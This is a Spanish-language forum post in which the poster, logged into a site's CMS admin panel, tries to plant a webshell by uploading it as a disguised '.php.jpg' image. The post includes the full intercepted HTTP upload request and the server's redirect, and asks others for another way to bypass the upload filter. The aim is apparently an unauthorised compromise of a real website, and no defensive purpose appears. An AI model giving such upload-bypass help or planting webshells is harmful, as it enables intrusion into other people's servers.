Alguien puede decirme en que fallo?? Me registro como admin, busco en el CMS un img, le subo la webshell como .php.jpg, me dice que esta bien subida, pero despues no aparece donde estaba la img.
Aqui os dejo la captura de LiveHTTPheaders
despues de modificar con LiveHTTPheaders:
Location: categories?type=Edit&rid=63&msg=image is not supported either invalid format or image size!!
no se seguir
necesito otro metodo para bypass el updoad
no quería hacer otro post asi que modifico este
/////////////////////////////////////////////
POST /admin/categories?rid=63&type=Edit&play=save&page= HTTP/1.1
Host: www.*********.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer:
http://www.*********.com/admin/categories?type=Edit&rid=63&page=Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892
Content-Type: multipart/form-data; boundary=---------------------------1966138998259963822131653635
Content-Length: 74857
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="categories_name_1"
Cloth Dryers
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="meta_keywords_1"
Cloth Dryers
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="meta_description_1"
Cloth Dryers
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="categories_description_1"
<p>Cloth Dryers</p>
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="parent_id"
43
-----------------------------1966138998259963822131653635
Content-Disposition: form-data; name="categories_image"; filename="W5h311Oculta.php.
jpg"
<----lo cambio a .php (bypass)
Content-Type: image/jpeg
.
.
.
.
.
.
HTTP/1.1 302 Moved Temporarily <<<----------------------------- ESTE ES LO QUE NO ME DEJA SUBIR LA SHELL????????????Date: Sat, 25 Aug 2012 15:36:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /admin/categories?page=&msg=selected categories modified successfully!! <<<------------- ESTO NO CONTRADICE LO ANTERIOR????Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html
//////////////////////////////////// aqui esta toda la cadena:
http://pastebin.com/LJ6mvpCpEl codigo de estado 302: Similar a 301, excepto que la nueva URL debería ser interpretada como reemplazada temporalmente, no permanentemente.
fuente y mas info:
https://tpv.4b.es/tpvv/consultas/doc/Documentos%20Errores/C%C3%B3digos%20de%20Estado%20HTTP%201.htm